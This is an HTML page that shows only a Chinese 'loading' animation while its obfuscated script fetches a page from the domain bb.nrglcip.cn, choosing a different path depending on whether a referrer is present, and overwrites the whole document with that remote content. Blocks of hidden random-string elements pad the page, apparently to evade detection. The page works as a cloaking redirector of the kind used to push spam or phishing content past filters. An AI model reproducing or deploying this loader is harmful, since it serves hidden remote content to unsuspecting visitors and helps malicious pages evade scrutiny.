<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .HGp5VdaSD {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .HGp5VdaSD .s0ERbDkkK {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .HGp5VdaSD .content {
            line-height: 50px;
            text-align: center
        }

        .HGp5VdaSD .img {
            width: 100%
        }

        .HGp5VdaSD .lB3NogBjH {
            text-align: center
        }

        .HGp5VdaSD .lB3NogBjH span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .HGp5VdaSD .lB3NogBjH span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .HGp5VdaSD .lB3NogBjH span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .HGp5VdaSD .lB3NogBjH span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .HGp5VdaSD .lB3NogBjH span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .HGp5VdaSD .lB3NogBjH span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .HGp5VdaSD .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function um5EcEbZO(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var DSxoEd6 = um5EcEbZO('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ DSxoEd6 +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ DSxoEd6 +".html?a=share";
		}
		
        DKfmN0NLW=url+"#"+new Date().getTime();
        DKfmN0NLW && function() {
            $.get(DKfmN0NLW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<div style='display:none'>kVUeUXum1kZxP6SoLDw5J2tXck6j2lkelj1xtD3aRKLoj36KHvQ18FtsCTvc91TBwyohXffg7hOspPcG</div>
<div style='display:none'>kVUeUXum1kZxP6SoLDw5J2tXck6j2lkelj1xtD3aRKLoj36KHvQ18FtsCTvc91TBwyohXffg7hOspPcG</div>
<span style='display:none'>ehyXDRF1NFPCiyXx0xEnYshuee0lPsm5tkHoYfMtYxz2G5XlK3ojd4dRB65IhBJ4qMTlEdoGZ2BpxGsQkSwTvm7TCt</span>
<b style='display:none' >WB6PKP6rVN4yxctfRTyM3ePypWYAuysOu7lvkaglTnojFjtBUXMRQd2Z</b>
<b style='display:none' >WB6PKP6rVN4yxctfRTyM3ePypWYAuysOu7lvkaglTnojFjtBUXMRQd2Z</b>
<ul style='display:none' >p4nQEZjWjNOphJ6udZddb0</ul>
<div style='display:none'>kVUeUXum1kZxP6SoLDw5J2tXck6j2lkelj1xtD3aRKLoj36KHvQ18FtsCTvc91TBwyohXffg7hOspPcG</div>
<div style='display:none'>kVUeUXum1kZxP6SoLDw5J2tXck6j2lkelj1xtD3aRKLoj36KHvQ18FtsCTvc91TBwyohXffg7hOspPcG</div><div class="HGp5VdaSD">
    <div class="s0ERbDkkK">
        <div class="lB3NogBjH">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<h1 style='display:none' >SAg1669ZXYSfweyCR3X9WxEC35WECjhUXQp9vg</h1>
<a  href='#' style='display:none'>GmwVdafsC0DYl1v06XWBPykvNZFiZFgVWz5PzJaicEXyhAQCsphVs8yRINV</a>
<div style='display:none'>Y2CPGI6zvYueiFsG5lstQ2i2igqAOGEP0JYqNqshNrWeECFYROnj6SHN7zAXARnIOM86heZU</div>
<div style='display:none'>Y2CPGI6zvYueiFsG5lstQ2i2igqAOGEP0JYqNqshNrWeECFYROnj6SHN7zAXARnIOM86heZU</div>
<ul style='display:none' >hg934UdtOxbZmw5kaZfDBhKMRPNIoKA6zmM83ImuegJiHw9jgEL0kTkLphyKzTHYlfDJGrfs9gAhK</ul>
<ul style='display:none' >hg934UdtOxbZmw5kaZfDBhKMRPNIoKA6zmM83ImuegJiHw9jgEL0kTkLphyKzTHYlfDJGrfs9gAhK</ul>
<b style='display:none' >D5Wrs42Qf7R65MfDeBnBf8adR2SoTcRbN16AxqqdVX7iC</b>
<li style='display:none' >zdYfVCQSnzXLwfLB3pnIUz</li></body>
</html>